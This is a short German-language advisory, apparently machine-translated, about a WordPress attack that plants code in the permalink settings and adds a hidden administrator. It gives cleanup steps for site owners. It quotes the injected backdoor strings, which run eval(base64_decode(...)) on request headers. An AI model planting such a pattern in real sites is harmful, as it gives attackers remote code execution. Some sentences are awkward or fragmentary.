WordPress SQL Injection - Letzter Angriff

WordPress SQL Injection - Letzter Angriff / Nachrichten

Viele Sites werden von einem kürzlich durchgeführten SQL-Angriff getroffen, bei dem Codes in Ihre Site eingefügt werden. Diese MySQL-Injektion beeinflusst Ihre Permalinks, indem Sie sie unwirksam machen. Daher funktionieren die URLs Ihrer Blogbeiträge nicht. Bei diesem Angriff wurden zahlreiche WordPress-Blogs ins Visier genommen.

Es gibt einen der folgenden Codes, die aufgrund dieses Angriffs zu Ihrer Permalink-Struktur hinzugefügt wurden:

% & ($ eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Diese Anführungszeichen fügten alle Permalinks auf Ihrer Website hinzu und können nur geändert werden, wenn sie manuell entfernt werden.

Um dies zu beheben, gehen Sie zu:

Einstellungen> Permalinks und entfernen Sie den obigen Code und ersetzen Sie Ihren Standardcode.

Als nächstes müssen Sie zu den Benutzern gehen. Sie werden sehen, dass es mehr als einen Administrator gibt. Ihr Name wird nicht aufgelistet, aber die Anzahl wird erhöht. Sie müssen sich also alle Benutzer ansehen und den letzten registrierten Benutzer finden. Bewegen Sie die Maus über diesen Benutzer und rufen Sie den Link auf. Ändern Sie den Code userid =, indem Sie dieser Nummer 1 hinzufügen. Wenn der letzte Benutzer, den Sie sehen können, Benutzer # 2 ist, fügen Sie 1 hinzu und machen Sie es 3. Sie sollten feststellen, dass der versteckte Administrator einen sonderbaren Code als Vornamen hat. Löschen Sie den Code und machen Sie ihn zum Abonnenten. Dann kehre zurück und lösche ihn.

Dies sollte das Problem beheben. Sie können ihn auch löschen, indem Sie einfach zu Ihrem PHPMyAdmin gehen. Weil Sie den Benutzer dort sehen.

Wir wollten diese Neuigkeiten so schnell wie möglich herausbringen, damit unsere Benutzer aktualisiert werden können. Bitte stellen Sie sicher, dass Ihr Blog nicht infiziert ist. Wir hoffen, dass WordPress bald veröffentlicht wird.

Auch wenn Sie einige dieser Maßnahmen nicht implementiert haben, um Ihren WordPress-Admin-Bereich zu sichern.